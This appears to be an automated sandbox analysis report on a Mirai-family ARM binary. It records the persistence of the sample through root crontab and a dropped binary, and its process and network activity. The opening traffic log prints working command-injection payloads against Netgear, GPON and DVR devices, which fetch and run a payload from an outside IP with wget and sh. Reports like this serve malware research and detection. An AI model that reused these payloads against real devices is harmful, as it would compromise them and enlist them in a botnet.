Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.162Connection: close
Source: global traffic HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.194Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.194Connection: close
Source: global traffic HTTP traffic detected: GET /language/Swedish && cd /tmp && echo 'allah_is_satan' > satan || cd /mnt && echo 'allah_is_satan' > satan; wget http://"/local_dvr1; wget http://45.159.211.121/f -O allah_is_satan;sh allah_is_satan && tar /string.js HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /shell?cd+/tmp;rm+-rf+f;wget+http://"/local_dvr2;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /board.cgi?cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_dvr3_macron;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /cgi-bin/;cmd=cd+/tmp;rm+-rf+f;wget+http://"/local_netgear1;wget+http://45.159.211.121/f;sh+f;echo+'allah_is_satan'+>+allah_is_satan; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /setup.cgi?next_file=netgear.cfg&todo=syscmd&cmd=cd /tmp;wget http://"/local_netgear_dgn1000;wget http://45.159.211.121/f -O fck;sh fck;&curpath=/&currentsetting.htm=1 HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET /device.rsp?opt=sys&cmd=___S_O_S_T_R_E_A_MAX___&mdb=sos&mdc=cd /mnt||cd /tmp;wget http://"/local_tbk_dvr;wget http://45.159.211.121/f -O fck;sh fck; HTTP/1.1Host: 192.168.0.37Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 104.21.84.89Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 84.201.165.75Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 194.58.112.174Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 91.226.31.83Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 90.188.239.74Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 178.159.33.243Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 157.230.19.197Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.80.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.177.76.70Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 185.133.42.146Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 78.108.89.108Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 78.108.89.108Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 31.31.205.163Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 62.122.170.171Connection: close
Source: global traffic HTTP traffic detected: GET / HTTP/1.1Host: 212.109.199.81Connection: close
Source: unknown HTTP traffic detected: POST /GponForm/diag_Form?images/ HTTP/1.1Host: 192.168.0.37Content-Length: 216Connection: closeData Raw: 58 57 65 62 50 61 67 65 4e 61 6d 65 3d 64 69 61 67 26 64 69 61 67 5f 61 63 74 69 6f 6e 3d 70 69 6e 67 26 77 61 6e 5f 63 6f 6e 6c 69 73 74 3d 30 26 64 65 73 74 5f 68 6f 73 74 3d 60 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 60 3b 77 67 65 74 20 68 74 74 70 3a 2f 2f 16 17 0c 13 17 10 0c 13 13 10 0c 16 14 22 2f 67 70 6f 6e 5f 6c 6f 63 61 6c 3b 20 77 67 65 74 20 68 74 74 70 3a 2f 2f 34 35 2e 31 35 39 2e 32 31 31 2e 31 32 31 2f 66 20 2d 4f 2d 7c 73 68 26 69 70 76 3d 30 Data Ascii: XWebPageName=diag&diag_action=ping&wan_conlist=0&dest_host=`wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh`;wget http://"/gpon_local; wget http://45.159.211.121/f -O-|sh&ipv=0

System Summary

Source: firmware.armv4l.elf, type: SAMPLE Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5499.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5501.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: 5490.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: /usr/bin/mabxpzyo, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: dropped/mabxpzyo, type: DROPPED Matched rule: Detects Mirai Botnet Malware Author: Florian Roth
Source: ELF static info symbol of initial sample .symtab present: no
Source: firmware.armv4l.elf, type: SAMPLE Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5499.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5501.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: 5490.1.00007ff29c017000.00007ff29c032000.r-x.sdmp, type: MEMORY Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: /usr/bin/mabxpzyo, type: DROPPED Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: dropped/mabxpzyo, type: DROPPED Matched rule: Mirai_Botnet_Malware date = 2016-10-04, author = Florian Roth, description = Detects Mirai Botnet Malware, reference = Internal Research, license = https://creativecommons.org/licenses/by-nc/4.0/
Source: classification engine Classification label: mal96.troj.evad.linELF@0/24@624/0

Persistence and Installation Behavior

Source: /bin/sh (PID: 5542) Crontab executable: /usr/bin/crontab -> crontab /var/spool/cron/crontabs/root
Source: /bin/sh (PID: 5543) Crontab executable: /usr/bin/crontab -> crontab /var/spool/cron/crontabs/root
Source: /tmp/firmware.armv4l.elf (PID: 5499) File: /var/spool/cron/crontabs/root
Source: /tmp/firmware.armv4l.elf (PID: 5501) File: /var/spool/cron/crontabs/root
Source: /usr/bin/crontab (PID: 5542) File: /var/spool/cron/crontabs/tmp.E2cA9e
Source: /usr/bin/crontab (PID: 5542) File: /var/spool/cron/crontabs/root
Source: /usr/bin/crontab (PID: 5543) File: /var/spool/cron/crontabs/tmp.sFbl3i
Source: /usr/bin/crontab (PID: 5543) File: /var/spool/cron/crontabs/root
Source: /tmp/firmware.armv4l.elf (PID: 5516) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5597) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5614) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5626) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5633) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5649) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5662) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5680) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5702) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5718) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5729) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5528) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5539) Shell command executed: sh -c "crontab /var/spool/cron/crontabs/root"
Source: /tmp/firmware.armv4l.elf (PID: 5513) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5607) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5621) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5643) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5657) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5671) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5695) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5712) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5738) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5527) Shell command executed: sh -c "hostname -I"
Source: /tmp/firmware.armv4l.elf (PID: 5538) Shell command executed: sh -c "crontab /var/spool/cron/crontabs/root"
Source: /bin/sh (PID: 5533) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5603) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5616) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5628) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5639) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5654) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5668) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5686) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5707) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5722) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5735) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5534) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5532) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5609) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5623) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5645) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5659) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5676) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5701) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5717) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5743) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /bin/sh (PID: 5535) Hostname executable: /usr/bin/hostname -> hostname -I
Source: /tmp/firmware.armv4l.elf (PID: 5499) File: /bin/mabxpzyo (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/firmware.armv4l.elf (PID: 5501) File: /bin/mabxpzyo (bits: - usr: rx grp: rx all: rwx)
Source: /tmp/firmware.armv4l.elf (PID: 5499) File written: /usr/bin/mabxpzyo
Source: /tmp/firmware.armv4l.elf (PID: 5501) File written: /usr/bin/mabxpzyo

Hooking and other Techniques for Hiding and Protection

Source: /tmp/firmware.armv4l.elf (PID: 5499) File: /usr/bin/mabxpzyo
Source: /tmp/firmware.armv4l.elf (PID: 5501) File: /usr/bin/mabxpzyo
Source: unknown Network traffic detected: HTTP traffic on port 43406 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43408 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43410 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43412 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 43414 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 44744 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 44842 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 52764 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57196 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57198 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57200 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57220 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57222 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 57224 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 33232 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34582 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34584 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 34586 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36084 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36086 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 36088 -> 8081
Source: unknown Network traffic detected: HTTP traffic on port 42566 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42570 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42572 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42574 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42576 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42578 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 42580 -> 83
Source: unknown Network traffic detected: HTTP traffic on port 35960 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35966 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35974 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35984 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35986 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35988 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 35990 -> 82
Source: unknown Network traffic detected: HTTP traffic on port 46950 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46952 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46954 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46956 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46958 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46960 -> 8082
Source: unknown Network traffic detected: HTTP traffic on port 46980 -> 8082
Source: /tmp/firmware.armv4l.elf (PID: 5490) Queries kernel information via 'uname':
Source: firmware.armv4l.elf, 5490.1.000055ca3fe63000.000055ca3ffb1000.rw-.sdmp, firmware.armv4l.elf, 5499.1.000055ca3fe63000.000055ca3ffb1000.rw-.sdmp, firmware.armv4l.elf, 5501.1.000055ca3fe63000.000055ca3ffb1000.rw-.sdmp Binary or memory string: U!/etc/qemu-binfmt/arm
Source: firmware.armv4l.elf, 5490.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp, firmware.armv4l.elf, 5499.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp, firmware.armv4l.elf, 5501.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp Binary or memory string: [x86_64/usr/bin/qemu-arm/tmp/firmware.armv4l.elfSUDO_USER=saturninoPATH=/usr/local/sbin:/usr/local/bin:/usr/sbin:/usr/bin:/sbin:/bin:/snap/binDISPLAY=:1.0XAUTHORITY=/run/user/1000/gdm/XauthoritySUDO_UID=1000TERM=xterm-256colorCOLORTERM=truecolorLOGNAME=rootUSER=rootLANG=en_US.UTF-8SUDO_COMMAND=/bin/bashHOME=/rootMAIL=/var/mail/rootSUDO_GID=1000SHELL=/bin/bash/tmp/firmware.armv4l.elf
Source: firmware.armv4l.elf, 5490.1.000055ca3fe63000.000055ca3ffb1000.rw-.sdmp, firmware.armv4l.elf, 5499.1.000055ca3fe63000.000055ca3ffb1000.rw-.sdmp, firmware.armv4l.elf, 5501.1.000055ca3fe63000.000055ca3ffb1000.rw-.sdmp Binary or memory string: /etc/qemu-binfmt/arm
Source: firmware.armv4l.elf, 5490.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp, firmware.armv4l.elf, 5499.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp, firmware.armv4l.elf, 5501.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp Binary or memory string: /usr/bin/qemu-arm
Source: firmware.armv4l.elf, 5499.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp, firmware.armv4l.elf, 5501.1.00007ffce7d69000.00007ffce7d8a000.rw-.sdmp Binary or memory string: qemu: uncaught target signal 11 (Segmentation fault) - core dumped